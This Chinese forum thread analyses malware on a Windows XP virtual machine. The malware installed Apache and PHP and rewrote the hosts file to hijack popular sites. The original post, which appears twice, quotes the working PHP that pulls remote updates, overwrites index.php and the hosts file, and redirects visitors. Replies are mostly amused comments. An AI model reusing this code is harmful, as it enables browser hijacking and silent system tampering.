这是一个创建于 4434 天前的主题,其中的信息可能已经有所发展或是发生改变。
本人有个xp虚拟机,上面没装杀毒软件。有一次不知安装了什么,桌面上总是会自动创建某网站的快捷方式,然后看进程把几个exe删掉就好了。
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。
贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";
//获取最新php
$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);
$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}
//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化
$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}
?>
<meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">
config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
看进程的时候发现有个apache,我想我没装过啊,而且这个雨林木风的盗版碟也应该不自带啊。看了看apache的安装目录,也正常,不像是病毒伪装的。于是想看看是什么,浏览器输入localhost,结果跳转到了某个网站。于是想到hosts被改了,打开hosts,看到localhost是127.0.0.1,没问题啊,再往下一看,好多记录啊,常用的一些导航网站,下载网站,杀毒网站全被解析到了127.x.x.x,于是我似乎明白了什么。立马回到apache目录,发现居然还安装有php,打开htdocs,有个index.php和404.html,打开看了看,觉得这病毒作者很蛋疼啊,有必要为了劫持网站费这么多事嘛,把php和apache都给装上了,是哪个无证程序员写的啊。
贴index.php给大家看看(还自带注释的-_-||):
<?php
include_once "config.php";
$name1 = "www.2345.com,2345.com";
$name2 = "www.tao123.com,tao123.com";
//$name3 = "www.hao123.com,hao123.com";
//获取最新php
$index = file_get_contents('http://www.129129.com/ht/index.txt');
if(strpos($index, '@')!==false)
{
$arr = explode("@", $index);
$index = $arr[1];
$hosts = $arr[0];
$index = get_rep($index);
if(!empty($index)){
if(file_put_contents("index.php", $index)==0){}
}
//获取最新hosts
if(!empty($hosts)){
if(file_put_contents("C:/WINDOWS/system32/drivers/etc/hosts", $hosts)==0){}
}
}
//域名跳转个性化
$serverName = $_SERVER['SERVER_NAME'];
switch ($serverName) {
case strpos($name1,$serverName)!==false:
header("Location:http://www.129129.com/?1");exit;
break;
case strpos($name2,$serverName)!==false:
header("Location:http://www.129129.com/?2");exit;
break;
case strpos($name3,$serverName)!==false:
header("Location:http://www.129129.com/?3");exit;
break;
default:
header("Location:http://www.129129.com/?4");exit;
break;
}
?>
<meta http-equiv="refresh" content="0;url=http://www.129129.com/?301">
config.php:
<?php
function get_rep($index)
{
return str_replace('explode("%", $index)', 'explode("@", $index)', $index);
}
?>
 |
1
shierji 2013 年 11 月 25 日
原版才是正道啊……- -
|
 |
2
imsuwj 2013 年 11 月 25 日
很有想法。。。
|
 |
3
soulgain 2013 年 11 月 25 日
这恶意的方式好搞笑啊~~
|
 |
4
AstroProfundis 2013 年 11 月 25 日  1
莫名喜感是为啥...
|
 |
5
zts1993 2013 年 11 月 25 日 2
php程序员也可以写病毒啦,。。。。233333
|
 |
6
likuku 2013 年 11 月 25 日
虚拟机装好XP就立即安装MS官方的 security-essentials
|
 |
7
pirex 2013 年 11 月 25 日 1
好喜感。。
|
 |
8
lizheming 2013 年 11 月 25 日 via iPad
我想说这样能被杀毒软件检测出来么。感觉都是正常步骤额
|
 |
9
Mutoo 2013 年 11 月 25 日
Domain Name : 129129.com
Registrar: eName Technology Co.,Ltd. 注册人联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 管理人联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 技术联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 财务联系 Information : LinYu Xiamen eName Technology Co.,Ltd. CN Fujian Xiamenshi zhen zhu wan ruan jian yuan 361000 tel: 86 4000400044 fax: 86 4000044400 5 状态: clientDeleteProhibited clientTransferProhibited DNS服务器 : F1G1NS1.DNSPOD.NET F1G1NS2.DNSPOD.NET 创建时间 : 2010-10-27 18:50:02 过期时间 : 2015-10-27 18:50:02 ===== 居然是厦门的,丢人啊。 |
 |
10
kutata 2013 年 11 月 25 日
因为这样写杀毒软件不杀?-_-||
|
 |
11
DearMark 2013 年 11 月 25 日
觉历,这个Apache装得秒,你还可以用一下。
|
 |
12
0racleTink 2013 年 11 月 25 日
确实啊,这样应该能躲过杀毒软件
|
 |
14
plprapper 2013 年 11 月 25 日 1
想当年 学校里上 lamp课程的时候 很多同学搞不定环境安装 各种报错。。。。
哈哈 把这个东西发给学校老师把, 一键搞定。 |
 |
15
raincious 2013 年 11 月 25 日 via Android
好奇为什么不用nodejs写,又轻又小,再不济用php自己的服务器啊。
要是再把mysql装上就搞了。 |
 |
16
yfdyh000 2013 年 11 月 26 日
网页直接嵌入了 http://www.qq.net/129129_2.html ,页面修改自114la,很多都没改。
粤ICP备05021225号-5。这是雨林木风的?…… |
 |
17
lhx2008 2013 年 11 月 26 日
跳转的方法蛋疼,一眼就知道被劫持了把,而且改hosts不能过杀软
|
 |
18
jianghu52 2013 年 11 月 26 日
话说命名还挺规范的啊。
|
 |
19
qonco 2013 年 11 月 26 日
//域名跳转个性化
噗~ |
 |
20
wheatcc 2013 年 11 月 26 日 1
居然装apache,噗~
|
|
21
wheatcc 2013 年 11 月 26 日
还自带注释,噗~
|
 |
22
xiaket 2013 年 11 月 26 日
真有创意...
|
 |
23
sun019 2013 年 11 月 26 日 1
创意啊 不错 收藏了
|
 |
24
meta 2013 年 11 月 26 日
这得多大一个体积的病毒啊。
|
 |
25
wingoo 2013 年 11 月 26 日
关键是杀毒软件不杀..
|
 |
26
justfindu 2013 年 11 月 26 日
还写注释~ 这习惯真好啊
|
 |
27
tuzi 2013 年 11 月 26 日
这思路绝了,可惜没用在正路上!
|
 |
28
Legend 2013 年 11 月 26 日
|
 |
29
refresh 2013 年 11 月 26 日
难道杀毒软件不管个性hosts么,hosts需要权限吧
|
 |
30
summic 2013 年 11 月 26 日
思路牛逼,估计那家伙很快就会用几十k的webserver换掉apache和php
|
 |
31
kfll 2013 年 11 月 26 日 via iPhone
还好只是跳转……要是直接在本地搭钓鱼站……还能随时更新……简直……
|
 |
32
josephok 2013 年 11 月 26 日
XD
|
 |
33
lucker6666 2013 年 11 月 26 日
@kfll 这思路 nb了
|
 |
34
erse 2013 年 11 月 26 日
牛逼的思路,这可以算是流量么?
|
 |
35
kran 2013 年 11 月 26 日
能把apache装上那简直是不容易了,手动安装我都嫌烦。。
|
 |
36
zjgsamuel 2013 年 11 月 26 日
这肉鸡使的 学习了!!
|
 |
37
tywtyw2002 2013 年 11 月 26 日
我还见过一个木马呢,把某个webhosting的母鸡给入侵了。
自己编译了一个新的nginx,在这个nginx里面加入了功能,随机把网页302倒色情广告联盟,然后加上cookie,这样用户第二次访问就不会跳转了。。。。。 然后把老的nginx文件给替换成一个sh脚本。。。。 |
 |
38
aivier 2013 年 11 月 26 日
好吧,无敌了,竟然还可以这样写恶意软件。。。!
|
 |
39
chengzi 2013 年 11 月 26 日 1
注释好习惯
|
 |
40
codegear 2013 年 11 月 26 日 via Android
莫名的喜感啊!
|
 |
41
laobubu 2013 年 11 月 26 日 via Android
求病毒,一键部署apache啊!!
|
 |
42
iqincai 2013 年 11 月 27 日 via Android
好有喜感啊-.-
|
 |
43
tioover 2013 年 11 月 27 日
23333
|
 |
44
Quaintjade 2013 年 11 月 27 日
以前有笑话说用C#写个病毒还要先帮用户下载安装合适版本的.NET Framework,没想到还真有写个php病毒先帮用户安装apache和php的……
|
 |
45
chens 2013 年 11 月 28 日
思路挺牛x
|
 |
46
yanwen 2013 年 12 月 16 日
@tywtyw2002 好牛逼。。
|
Select Language